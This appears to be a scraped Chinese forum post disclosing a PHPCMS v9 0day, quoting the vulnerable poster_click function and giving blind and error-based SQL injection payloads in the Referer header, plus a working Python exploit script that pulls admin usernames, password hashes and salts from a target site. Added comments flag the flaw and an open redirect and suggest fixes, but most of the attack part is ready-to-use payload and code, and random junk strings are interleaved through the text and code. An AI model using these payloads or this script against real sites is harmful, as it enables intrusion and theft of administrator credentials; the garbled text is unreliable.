有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
; o& h3 D5 i/ ?- ^( D: S) N
问题函数:\phpcms\modules\poster\index.php
! P# E% d }& i I+ R& Z* c
// Counts a click on poster $id and redirects the visitor to the poster's link URL.
// Input:  $_GET['id'] and $_GET['siteid'] (both cast with intval), $_GET['url'] (raw, see below).
// Effect: inserts one click row, increments the poster's click counter, sends a Location header.
// Returns false when no poster row matches $id.
//
// NOTE(review): two request-controlled values reach sinks with no validation visible in this
// listing. (1) HTTP_REFERER — a constant defined outside this method, presumably populated from
// the request's Referer header — is passed as-is into the s_db insert; this is the SQL injection
// point the article describes. Fix: quote/bind the value through the DB layer before the insert
// and cap its length. (2) $_GET['url'] becomes the redirect target whenever the poster has more
// than one setting entry, with no allow-list check — this looks like an open redirect. Fix: only
// redirect to the poster's own configured linkurl values.
4 @/ ~4 r. R& [& Z. Apublic function poster_click() {
// intval() forces an integer, so the lookup key below cannot carry SQL.
6 B, V$ B. i! h* }- ?$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 c$ z* B n" t" k$r = $this->db->get_one(array('id'=>$id));
// Bail out when no poster row exists for $id.
+ p4 s+ p* d3 R0 G! \if (!is_array($r) && empty($r)) return false;& w2 `; j1 I( C4 ~- d- U! i* o% S
// ip() and $ip_area->get() are opaque here; whether their results are safe to store unescaped
// cannot be told from this listing.
$ip_area = pc_base::load_sys_class('ip_area');# n" W9 y3 U+ m2 V" K, T, R
$ip = ip();
4 N( ~% Q, s1 q; q* p1 B( V$area = $ip_area->get($ip);3 L$ W8 M' B( k& W% H/ o8 f( z5 ]
// Username comes from a cookie; param::get_cookie() is not shown, so its sanitisation is unknown.
$username = param::get_cookie('username') ? param::get_cookie('username') : ''; s, K# H: a# X6 S# q, c
if($id) {
* R6 Q1 y ~7 ?$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
// SQL injection sink: 'referer' => HTTP_REFERER is inserted without any escaping visible here.
+ j7 Z+ g1 ]- f7 _$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
c l I b6 n3 l6 t# l}. K' Y: z; g6 G8 N' u# V2 o* Z' ~
// Increment the click counter; the '+=1' value is a literal, not request data.
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ w0 H: c, j, K! ]! O" I& v$setting = string2array($r['setting']);; b% r: n/ _% x7 u( {' P7 y: o( Z% x
// Single-entry posters always use their configured link; multi-entry ones accept ?url= instead.
if (count($setting)==1) { P; s$ W( u" X& C- Z' \5 T
$url = $setting['1']['linkurl'];$ q" m+ Y5 P7 Q5 F& ]' z
} else {+ k0 u8 t- g, r) t
// Redirect target taken from the request and not checked against the poster's configured links.
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
3 n% d9 k# {9 H/ w3 D4 ]}
9 V* e3 @, L# E- S+ X3 c1 u! pheader('Location: '.$url);
' c9 W( a2 G, Q$ ]}( z6 P; n. x" h
, e2 T' v" k# v3 g* Z 2 Y) W6 v: e' L, Z- F
利用方式:
' z& [$ _9 E0 A! g X- r/ g+ ~8 P* Y: s1 v; \
1、可以采用盲注入的手法:
3 I3 k1 W0 N0 S: B9 ~5 K
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#1 f6 q- W! p+ q' R, A, C" {) X
- E$ u1 f" k! K, `2 {$ V
通过返回页面,正常与否一个个猜解密码字段。
* c5 a& }3 x9 g; G D7 ?
2、代码是花开写的,随手附上了:
# v8 h6 s3 }* _9 \! I0 R0 g3 Y% g& m M) R6 C
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#' i* r* x0 b; ?8 X% J& v; v
, L, x3 _+ B* V" [; \
此方法是爆错注入手法,原理自查。
* ?$ v) M4 q. |- `9 d/ t+ `
* P( ~ e$ L/ ]9 M$ ?! V
" S3 `0 F5 R8 `; d3 G" I7 K利用程序:
2 g( F/ X7 s4 Z
/ d9 y$ d7 ^0 ]8 ?5 e0 N- }( B#!/usr/bin/env python+ j4 L$ m5 l. ^# J& ]7 `+ J
import httplib,sys,re
3 \( e( h+ o& _3 S, {
# Proof-of-concept request as published in the article (Python 2: print statements, httplib).
# argv[1] is the target host, argv[2] the base path of the PHPCMS install.
# Sends one GET to the poster_click action with the error-based payload in the Referer header,
# then prints the MySQL "Duplicate entry" fragment found in the response body.
#
# Defender notes: the request is recognisable in access logs by the m=poster&c=index&a=poster_click
# query paired with a Referer header containing SQL keywords; the response side is recognisable
# by a raw MySQL "Duplicate entry" error reaching the client. Suppressing verbose DB errors in
# production removes the channel this PoC reads from, but not the injection itself — the fix is
# escaping/binding the referer value before the insert.
6 v) o& |! t% U" Xdef attack():8 ]& F* _: W0 A& V+ p
print “Code by Pax.Mac Team conqu3r!”9 l0 @7 ~* \: D1 q
print “Welcome to our zone!!!”
# Target host and install base path come straight from the command line.
; b5 o; o* X8 ?' V" N7 P9 ~$ Murl=sys.argv[1]
/ M4 j+ `. ?8 l) b( r$ U' opaths=sys.argv[2]. \ L& M; Q6 L+ X; h+ r! x1 e1 P
conn = httplib.HTTPConnection(url)
# The injection is carried in the Referer header, which poster_click stores unescaped.
) v* g E) ?; u2 fi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,& p4 E- q& e1 h& G- n. ? `4 v4 }
“Accept”: “text/plain”,
- k3 Y; h& t6 {5 H. e“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”} e$ C) f2 c" W7 e4 x
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), N; ^) Y/ i/ Z8 N( h( f
r1 = conn.getresponse()# R* q7 P" W3 f: i" d. l6 ]6 C
datas=r1.read()$ ]- M+ H7 b; l5 v
# Result is read from the database error text echoed in the page (error-based technique).
datas=re.findall(r”Duplicate entry \’\w+’”, datas)+ ~! S7 n- M; H8 y0 g( \
print datas[0]- T5 y* t. P( y7 U( ^1 ]% B
conn.close()( z2 u ]! E- V. ?- v' z
# Script entry point: requires two arguments (host, base path); otherwise prints usage and
# exits with status 1. Indentation was lost in the forum paste, so the block structure below
# has to be read from the statement order.
if __name__==”__main__”:5 I7 p7 ~% e* O8 B
if len(sys.argv)<3:# v' A) i: x2 N" ? [
print “Code by Pax.Mac Team conqu3r”; O) o% Y! s; x7 V0 P0 \; V$ W, O
print “Usgae:”
* j$ P" J: M7 M/ C' j8 G* O% c8 Sprint “ phpcmsattack.py www.paxmac.org /”
* B+ K- C$ ~! u! \% ^( F# A- Nprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”! O5 z# b. `9 g" x! M2 _
sys.exit(1)
) e6 T! m% Y+ Y2 cattack() m& M S; _; r3 W8 n1 R& E) v
- o3 F+ [, M. p/ X, I
|